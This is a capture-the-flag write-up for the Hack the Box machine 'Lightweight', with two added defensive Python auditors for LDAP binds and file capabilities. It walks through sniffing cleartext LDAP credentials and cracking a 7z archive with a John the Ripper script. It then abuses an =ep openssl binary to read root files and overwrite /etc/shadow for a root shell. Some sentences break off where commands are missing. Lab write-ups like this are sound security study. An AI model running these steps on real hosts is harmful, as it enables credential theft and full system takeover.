It's been a while since I've had any free time to devote to Hack the Box recently as life has been getting in the way as well as working my way through the newly released AWAE course from Offensive Security. But I finally found a few spare moments to brush off some of the cobwebs and have a go at the machine, Lightweight.
As always, we begin with our trusty nmap scan.
nmap -sC -sV -p- -oA scan 10.10.10.119
Not too many services here, so let's start with HTTP.
Browsing to the IP gives us nothing, so add the hostname.
Browsing the various links gives us some interesting info. After making an HTTP request to the user page, the system will have created us an SSH login where the username and password are just our IP address, so we can ssh straight to the server after visiting that page.
No user flag yet though - that would be too easy.
Looking in the home directory, we see a couple of users using plain IP addresses as usernames (such as our own), but there's another couple in there that look interesting,
As we can see from our initial nmap scan, the LDAP port is open, so perhaps the website uses LDAP for authentication? And since it is a plaintext protocol, maybe we can capture some of the traffic.
tcpdump -i lo port 389 -w capture.pcap
To actually generate some traffic whilst tcpdump is listening, browse through the website pages; the status one seems to take a long time for no obvious reason, so we'll start there.
Once you have some traffic captured, copy the file back to our Kali box, open it in Wireshark, and then filter by
That authentication line looks interesting.
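The reason the password shows up in the capture is that an LDAP simple bind sends the DN and password inside a plain BER-encoded BindRequest; nothing protects it unless the connection is wrapped in TLS (LDAPS or StartTLS). The script below is an added example, not code from the original post: it decodes a BindRequest and flags cleartext simple binds, which is the check a defender would run over port 389 traffic. The two messages it inspects are constructed by hand (the DN, password and SASL mechanism are made up) so that it runs offline; in practice the payloads would be the TCP segment bodies from the tcpdump capture.

```python
"""
Flag LDAP simple binds, whose password travels in the clear on port 389
unless the session is wrapped in TLS.

Added example for this writeup; it is not code from the original post. The
two BindRequest messages below are constructed (DN, password and SASL
mechanism are made up) so that the script runs offline.
"""

def tlv(tag, value):
    """Encode one BER tag-length-value (short or long definite length)."""
    if len(value) < 0x80:
        return bytes([tag, len(value)]) + value
    lb = len(value).to_bytes((len(value).bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value

def read_tlv(buf, pos):
    """Decode the TLV at buf[pos]; return (tag, value, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long-form length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def bind_request(msg_id, dn, password=None, mechanism=None):
    """Build an LDAPv3 BindRequest: simple (cleartext password) or SASL."""
    if password is not None:
        auth = tlv(0x80, password.encode())              # [0] simple
    else:
        auth = tlv(0xA3, tlv(0x04, mechanism.encode()))  # [3] sasl
    op = tlv(0x60, tlv(0x02, b"\x03") + tlv(0x04, dn.encode()) + auth)
    return tlv(0x30, tlv(0x02, bytes([msg_id])) + op)   # LDAPMessage

def parse_bind_request(payload):
    """Describe a BindRequest; None if the payload is not one (or truncated)."""
    try:
        if payload[0] != 0x30:
            return None
        _, msg, _ = read_tlv(payload, 0)
        tag, msg_id, pos = read_tlv(msg, 0)
        if tag != 0x02:
            return None
        tag, op, _ = read_tlv(msg, pos)
        if tag != 0x60:                    # [APPLICATION 0] = BindRequest
            return None
        _, version, pos = read_tlv(op, 0)
        _, name, pos = read_tlv(op, pos)
        auth_tag, auth, _ = read_tlv(op, pos)
    except IndexError:
        return None
    return {
        "message_id": int.from_bytes(msg_id, "big"),
        "version": int.from_bytes(version, "big"),
        "name": name.decode(errors="replace"),
        "simple": auth_tag == 0x80,        # [0] simple: password is cleartext
        "secret_len": len(auth) if auth_tag == 0x80 else 0,
    }

def audit(payloads):
    """Return one alert line per non-anonymous simple bind seen."""
    alerts = []
    for p in payloads:
        info = parse_bind_request(p)
        if info and info["simple"] and info["secret_len"]:
            alerts.append(f"cleartext simple bind as {info['name']!r} "
                          f"(msg {info['message_id']}, {info['secret_len']}-byte password)")
    return alerts

# Constructed sample traffic, not taken from the box.
SIMPLE_BIND = bind_request(1, "cn=ldapuser2,dc=example,dc=com", password="s3cret")
SASL_BIND = bind_request(2, "", mechanism="GSSAPI")

if __name__ == "__main__":
    for line in audit([SIMPLE_BIND, SASL_BIND]):
        print(line)
```

The SASL bind is included to show the contrast: the parser reports it as non-simple and raises no alert, because with a mechanism such as GSSAPI the secret never appears in the BindRequest. The fix on the server side is to require TLS (or reject simple binds over a cleartext session) rather than to hide the traffic.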
LDAP credentials are not Linux credentials, however, so we can't ssh in using this new password. We can just
Our new home folder has a file in there called backup.7z (and the first flag) so download it and let's take a look.
As we do not have SSH credentials for ldapuser2, we can get the file another way.
cat backup.7z | base64
We can then copy and paste the base64 encoded string to a file on our machine, and then decode it back into 7zip format.
cat encoded | base64 --decode > backup.7z
Then try to extract it.
7z x backup.7z
Password protected. Bugger.
But we can write a little bash script to utilise John The Ripper to crack the password - or we can use some google-fu and find one already written for us ;)
#!/bin/bash
# Try each candidate password from John's rule-expanded wordlist against the archive.
echo "7zip-JTR Decrypt Script"
if [ $# -ne 2 ]; then
    echo "Usage $0 <7z file> <wordlist>"
    exit 1
fi
7z l "$1"
echo "Generating wordlist..."
john --wordlist="$2" --rules --stdout | while read -r i; do
    echo -ne "\rTrying \"$i\" "
    # 7z exits 0 only when the password decrypts the archive; silence its output.
    7z x -p"$i" "$1" -aoa >/dev/null 2>&1
    STATUS=$?
    if [ $STATUS -eq 0 ]; then
        echo -e "\rArchive password is: \"$i\""
        break
    fi
done
And in fairly short order, it finds the password and decrypts the file for us.
The archive seems to contain a backup of the source files for the website we browsed earlier.
Taking a look at the source for the status.php file gives us the password to another user,
Using that we can make use of
Our new home directory has some interesting binaries in it,
During enumeration, when we look for files with special capabilities, one of our binaries shows up with something interesting.
getcap -r / 2>/dev/null
=ep privilege is special. It’s essentially blank, but what this actually means is that if you call it from the right location, then it will inherit the permissions of where it is called from ... so if you run it from the root directory, then you inherit everything!
So we can abuse this to read (or write) files we should not have access to.
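File capabilities are easy to miss in a review because they live in extended attributes rather than the mode bits that ls shows, and a bare =ep set is the worst case. The script below is an added example, not code from the original post: it parses getcap -r output, accepting both the older "/path = caps+ep" style and the newer "/path caps=ep" style, and ranks each binary by how far its capability set defeats normal file permissions. The sample output it ships with is constructed (the paths and capability sets are made up) so that it runs offline; pipe real getcap output into it on a host to triage it.

```python
"""
Triage `getcap -r / 2>/dev/null` output for file capabilities that let a
binary bypass normal file permissions.

Added example for this writeup; it is not code from the original post. The
sample output below is constructed (paths and capability sets are made up)
so the script runs offline; pipe real getcap output on stdin to use it.
"""
import re
import sys

# One capability clause as printed by cap_to_text(3): an optional
# comma-separated capability list, an operator and a flag set, e.g.
# "cap_net_raw=ep", "cap_chown,cap_fowner+ep" or the bare "=ep".
CLAUSE_RE = re.compile(
    r"^(?P<caps>(?:cap_[a-z_]+(?:,cap_[a-z_]+)*)?)(?P<op>[=+-])(?P<flags>[eip]+)$")

# Capabilities that on their own defeat the permission checks protecting
# files such as /etc/shadow, or let a process become another user.
HIGH_RISK = {
    "cap_dac_read_search": "read any file and traverse any directory",
    "cap_dac_override": "read, write or execute any file",
    "cap_chown": "change file ownership",
    "cap_fowner": "bypass owner checks on files",
    "cap_setuid": "change UID",
    "cap_setgid": "change GID",
    "cap_sys_admin": "broad administrative control",
    "cap_sys_ptrace": "inspect and control other processes",
    "cap_sys_module": "load kernel modules",
}

def parse_line(line):
    """Split one getcap line into (path, [clauses]); None for blank/garbage."""
    tokens = line.split()
    clauses = []
    # Clauses sit at the end of the line; walk back while tokens still parse.
    while tokens and CLAUSE_RE.match(tokens[-1]):
        clauses.insert(0, CLAUSE_RE.match(tokens.pop()).groupdict())
    if tokens and tokens[-1] == "=":       # older "/path = caps+ep" style
        tokens.pop()
    if not tokens or not clauses:
        return None
    return " ".join(tokens), clauses

def classify(clauses):
    """Return (severity, reason) for a parsed capability set."""
    severity, notes = "info", []
    for c in clauses:
        if c["op"] == "-" or not ("e" in c["flags"] or "p" in c["flags"]):
            continue                       # dropped or inheritable-only: no uplift
        if not c["caps"]:                  # empty list means every capability
            return ("critical", "all capabilities in effective+permitted (=ep)")
        for cap in c["caps"].split(","):
            if cap in HIGH_RISK:
                severity = "high"
                notes.append(f"{cap}: {HIGH_RISK[cap]}")
            else:
                notes.append(cap)
    return (severity, "; ".join(notes))

def audit_getcap(text):
    """Return [(path, severity, reason)] with the worst findings first."""
    order = {"critical": 0, "high": 1, "info": 2}
    findings = []
    for line in text.splitlines():
        parsed = parse_line(line)
        if parsed:
            path, clauses = parsed
            findings.append((path,) + classify(clauses))
    return sorted(findings, key=lambda f: order[f[1]])

# Constructed sample, not real getcap output from the box.
SAMPLE_OUTPUT = """\
/usr/bin/ping cap_net_raw=ep
/usr/sbin/arping = cap_net_raw+ep
/home/someuser/openssl =ep
/home/someuser/tcpdump = cap_net_admin,cap_net_raw+ep
/usr/bin/backup-tool cap_dac_read_search=ep
"""

if __name__ == "__main__":
    text = SAMPLE_OUTPUT if sys.stdin.isatty() else sys.stdin.read()
    for path, sev, reason in audit_getcap(text):
        print(f"[{sev:8}] {path}: {reason}")
```

Only clauses that put a capability into the effective or permitted set count; inheritable-only grants and "-" clauses are skipped because they confer nothing at execution time. The remediation for a hit like the =ep openssl copy is setcap -r on the binary (or removing the copy), and a periodic run of this check catches the attribute being re-added.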
First we generate some certificates:
cd /tmp
~/openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
Accept all the default options; once the certificate is generated, we can use openssl to start an HTTPS server.
cd /
~/openssl s_server -key /tmp/key.pem -cert /tmp/cert.pem -port 1337 -HTTP
Then using another shell, we can get the root flag.
We use the -k flag to ignore any SSL errors.
Now we could stop here, or we could go for a root shell.
Stretch Goal - root shell
Using the same HTTP server exploit above, we can read the /etc/shadow file and copy the contents to a temporary file.
Then we can generate a new root password.
mkpasswd -m sha-512 -S saltsalt -s
Enter your chosen password, then replace the password section of the shadow file for the root user with your new hashed password.
Then we encrypt our temporary shadow file.
openssl smime -encrypt -aes256 -in /tmp/shadow -binary -outform DER -out /tmp/shadow.enc /tmp/cert.pem
Now we overwrite the existing shadow file.
cd /
~/openssl smime -decrypt -in /tmp/shadow.enc -inform DER -inkey /tmp/key.pem -out /etc/shadow
Then we simply su root, enter our new password, and a root shell is ours.